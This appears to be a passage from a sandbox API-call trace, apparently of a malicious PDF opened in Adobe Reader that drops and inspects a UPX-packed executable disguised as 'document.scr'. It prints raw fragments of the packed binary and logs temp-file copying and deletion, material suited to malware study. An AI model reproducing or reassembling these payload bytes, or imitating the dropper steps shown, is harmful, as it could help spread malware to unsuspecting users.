Buffer => \xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe\x90\xa4U\xb4\x9f \xdf
\x93V\x1c\x8dp
\x1a\x84\x1d\xa1l \x8bJ\x1d\xb7zZ\xa6i\x9a\xce\x17\x03\x88\x8f\x96\x9d\xe0Md\x9a\xa4\xab\xa6Wh\x0c'4H\xd5m\xca~\x04G FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu^\xdc1"8\x02\xb7\x82\xc7\xd7\xff\xb1\x88\xaeW\xd5\xd8\x91\xcb{\xfeBR\x11\xbf2\xd9\x8b\xfd\xe9#\xc7P\x0c\x07&\xdezH\xc3m'hL\xe1V\x18_OP \xfaoS\xd1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => TW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P\x0f\xf4"\x88\x18N?\xfcf'W\xbe
\xceX\x91-'8\x9d'\x89#\xd4\xea\xfcp\xeb\xfd\xd69]\x8e\xc4\x17l7 \x90\xe8X\xeb\x18\xa2\x12\x94\xc0&<!rA\xc3
\x19 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => 4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10\x10^\xd68\xf8\xb6\xc8D\xdfW\x1f\xd1&\xd8\x99\xac\x15\x92J\xfc\xb3\xe7#~\xbcHz\x82\x00\x14\xdc(\xd1d\x01{\xecr\x01\xdf\xec\xe9\xd2\xdcW\x9f8\xf0\xbc\x02\x8fz}\xe7> FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => t,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+8+8\xcd%\x1c}\x80\xfc\xfe\x04\xa8\xceD`x\xb9M\x0e_\x9fT\xc2\x05\xb2\xff%\xf8{%\x00Ea\x86\x00\xb2\x00'\x8a",\x03\x88\x12\xa6i\x9a\xe6P\x00\x84\x80|xt FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => \x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd\xff\xc0\xad}Dv\x12\x17\x16+a\x18r\x81\xf7\x19\xb1\xcc\xfc\xf9\xbc{r\x9a\xb2\xea\x87\xc4t\xb7\xff\xff\xff\xbfH@Gv\xb8>\x1a9r\x0f\xc1dA\xca\x87\x12j\x86\x11\xcc\xc5 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => \x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9`\x85m\x82\xb0.'\xf78S|\x18\x18\xf8\x05\xfe_\x0f\xb1\xc4~\x03\xb4e\x12\xca\x1cI\x17\xf5\xcaq\x17\xad\xcf\xdf\xf8\xff\x17E\x8c\xbe2MISY\xca\xb9\xca\xc4\xbe=\xaa\xe7_ FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => \x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3\x8a$\x8d\x1d\x8c\x0c\x8f,\x96m\xff\xff\xff\xff\xd6(\x8e"\x91\x90n\x932v\x8a\xef(\xdb\x92\x95\x94\x97f\x96\x16\x99\x1c\xf2\x9dw\x98/^\x9b%\x9a\xc0\x0b\xff\xff\x9d\x0e\x9c\x8c3 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => \xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE\xcc\xf3\xea\xea\xbeO\x1e\x0ba
\xac \x06\xc7\xff\x7f\xab\x7f\xba\xe1\xfa\x91Cy\xbf\xb9\xf8f\xea\xd7\xfc\xc7*P;9u;\x109\xa1\xff\xff\xff\xadi\x10\xf5UF\x18\x0b\xb5\x08\xac FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => y)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8Z\x88Z6K\xb6\xbe\xb8aX\x00B\x8bu\xc9O\x07\xc9\xff\xff\xbf\xc4\xa1b\x1d\x85N\xbe\xbbM4\xf8\xbd\x17\xd0\xd9\xb1-%\x19\x82\xf2\x11\xc2\xfe\x05\xff\xff/\xf5\x9aUABz FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,925 | 1600 | NtReadFile |
Buffer => \x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae\x9c\xafN\xfe\x8eaEP\xff\xad\xfeKepj\x80\xe4}\x06'\xc0Q\x9e\xec\xe27=\xa5 \xd8\xfb\xff_\xf8j\x07\xcc\xc3\x06\xf21\xfa\x9e\xb3\xfbG\x12 k}GE\x01\x9eB FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,935 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 07:45:02,935 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: cp1254 to Unicode table
# Unicode version: 2.0
# Table version: 2.01
# Table format: Format A
# Date: 04/15/98
#
# Contact: cpxlate@microsoft.com
#
# General notes: no FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 07:45:02,945 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001d8 |
FAILURE | 3221225489 | |
| 07:45:02,955 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x0018f000 |
SUCCESS | 0x00000000 | |
| 07:45:02,955 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 07:45:02,955 | 1600 | NtReadFile |
Buffer => a\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2\x86E\xc2\x086\xb0@\x8e\xa8
\x97\xd8\xba\xef\x16\x1f\xc8\xb6\xf85\xa9\xcb)m\xcd@6\xc1\xc2o\xf5\xb6\xc1~@V\xcaF\xcb\x1eET\xa96\xf8\xfd\xbf\x0e\x81Q\xc7\x85h\xb9\xc1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,955 | 1600 | NtReadFile |
Buffer => z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b`.data\x98#\xeeB\xba\xc1\xfb"'v@\xbd\xcd`\x1b\x85.\xe5 \x00\xc3\xc0\x06|\xbf){4'@\x1b\xb0{
\x94\x00\x00JA< \x00\x00\x00\xff\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,955 | 1600 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x000\x00\xe0\xc0\x00\x00(\x00\x00\x00 \x00\x00\x00@\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x80\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,955 | 1600 | NtReadFile |
Buffer => \x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xe0\x03\x00\x00\xf0\x07\x00\x00\xf8\x0f\x00\x00\xfc\x1f\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xf0\xc4\x00\x00\x00\x00\x01\x00\x02\x00 \x10\x00\x01\x00\x04\x00\xe8\x02 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,955 | 1600 | NtReadFile |
Buffer =>
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,955 | 1600 | NtReadFile |
Buffer => \xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x91\xfb[\xfaa\xe0 \xd8\xc5\xef\xbc\xd1~\xb8%\x13uA!\x9e\xf1\x82\x01\xebd\x85\xa4\x0en%L\x9a\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3v FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:02,955 | 1600 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:45:02,995 | 1600 | DeleteFileA |
FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp4.tmp |
SUCCESS | 0x00000001 | |
| 07:45:02,995 | 504 | NtReadFile |
Buffer => ##Adobe File Version: 1.000
#
# Name: cp1257 to Unicode table
# Unicode version: 2.0
# Table version: 2.01
# Table format: Format A
# Date: 04/15/98
#
# Contact: cpxlate@microsoft.com
#
# General notes: no FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtCreateFile |
ShareAccess => 0 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp5.tmp DesiredAccess => 0x80100080 CreateDisposition => 2 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | CopyFileA |
ExistingFileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\document.scr NewFileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp5.tmp |
SUCCESS | 0x00000001 | |
| 07:45:03,005 | 1592 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp5.tmp DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtSetInformationFile |
FileHandle => 0x000001e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => \xd8\x00\x00\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtSetInformationFile |
FileHandle => 0x000001e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtSetInformationFile |
FileHandle => 0x000001e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => UPX0\x00\x00\x00\x00\x00\x80\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\xe0 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => UPX1\x00\x00\x00\x00\x00`\x00\x00\x00\x90\x00\x00\x00`\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xe0 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer => .rsrc\x00\x00\x00\x00\x10\x00\x00\x00\xf0\x00\x00\x00\x08\x00\x00\x00d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtSetInformationFile |
FileHandle => 0x000001e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\zincite.log DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,005 | 1592 | NtReadFile |
Buffer =>
\xf9pu\xff\x87\x8f\x81
\xea\xae\xdc\xf5\xd5\xae\xa8\xf5#\xba:
\xe1\x9a\xf5\x08#\xbb\xf5XQ\x8b\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
